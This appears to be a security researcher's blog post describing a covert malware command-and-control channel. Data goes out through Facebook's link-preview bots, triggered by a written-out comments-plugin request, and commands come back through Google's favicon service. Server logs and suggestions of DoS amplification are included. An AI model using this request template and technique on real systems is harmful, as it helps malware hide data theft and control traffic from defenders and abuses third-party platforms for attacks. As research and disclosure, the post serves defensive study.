APT: bot exfiltration

In the world of advanced persistent threats or APTs, techniques used by malware artifacts play an important role in communication and exfiltering information via C2s (Command & Control). In this sense, there are as many as there are protocols and services and an attacker can draw from his/her imagination. As just small examples of “tricks” for disguising illegitimate traffic as apparently normal information are:

  • HTTP requests to apparently licit pages, which have been cracked, housing C2 code.
  • Overuse of DNS protocol to exfilter and communicate with attackers.
  • Overuse of Google Calendar.

The above list can be almost as long as the number of present and past APT campaigns. In this post I’d like to offer a new form of exfiltration where the infected equipment and C2 don’t directly exchange information at any time. They do so through a legion of bots available to the great giants of the Internet: Google, Facebook or Twitter among others.

What are these bots for or what’s their function? With Facebook, they have a series of agents used to conduct a preview of the content in a link when a comment is posted on this social network. By doing so, it’s possible to present the user with the linked web content in a pleasanter way. So, when the link is received by Facebook they “order” their bots to visit the URL by extracting information from the associated web.

The reader will have realized that by controlling the URL which we want the bots to connect to, we have a way to send information to a domain owed by the attacker, redirecting the request via Facebook. This gives us the first “Infected equipment” -> “C2” communication channel. The request will go unnoticed by any of the victim’s possible security analysts as they’re really requests made against the social network.

The first obstacle to executing the redirection came from the need to have a valid Facebook account and be authenticated to post. Searching a bit further through their documentation, I found I could post without being authenticated. The magic was in the “Developers” section. I can hereby leave you with the GET request that allows you to control Facebook’s bots at your fancy and visit all you resend them.

https://www.facebook.com/plugins/comments.php
?api_key=113869198637480
&channel_url=http://static.ak.fbcdn.net/connect/xd_proxy.php?version=3#cb=f10df33f48&
origin=http://developers.facebook.com/f29957fd8&relation=parent.parent&transport=postmessage
&href=DOMAIN TO VISIT
&locale=en_US
&numposts=2
&sdk=joey
&width=500

The quick-witted will have already realized that you can use this not only to exfilter information but also, for example, to conduct hidden DoS attacks or increase visitor counts. As an example, I’m giving you my apache log, after telling Facebook to visit my website.

66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-" 
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/spotlight.jpg HTTP/1.1" 206 2582 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_4.jpg HTTP/1.1" 206 1356 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome-18.jpg HTTP/1.1" 206 8889 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1      
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome.jpg HTTP/1.1" 206 3987 
   "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.112 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-11.jpg HTTP/1.1" 206 654 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.117 - - [30/Oct/2014:11:45:17 +0100] "GET /images/services.jpg HTTP/1.1" 206 2794 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-" 
    "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-" 
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
       (+http://www.facebook.com/externalhit_uatext.php)"

The truth is you can get good amplification as one request to Facebook generated 43 GETs from 10 different bots to the desired website. But, I’m changing the subject, we’re with the APTs.

Now we can exfilter, we need to send control commands to the infected equipment in the victim organization. For this part we’ll look to the Google bots for help. These we can also control so that they not only visit what we want but also send our orders to the infected equipment.

Usually when a C2 wants to execute a command in the victim, it’s not done in the C2 -> “infected equipment” direction but just the opposite, as the malware carrier starts the communication.

Well, Google has a url through which, given a domain, it returns its own favicon, which is perfect for resending back the orders to be executed in the infected equipment.

http://www.google.com/s2/favicons?domain=DOMAIN-TO-VISIT

Once executed, we can see the next request made by the bot in the C2 log:

66.249.93.181 - - [31/Oct/2014:13:36:22 +0100] "GET / HTTP/1.1" 200 2961 "-" 
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"
66.249.93.178 - - [31/Oct/2014:13:36:23 +0100] "GET /favicon.ico HTTP/1.1" 200 1703 "-" 
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"

In this favicon we could, using stenographic techniques for example, include the control information sent to the infected equipment. We have thus set up a bi-directional communication with the C2s without having a direct channel between the infected equipment and the command and control equipment, perfect for going unnoticed.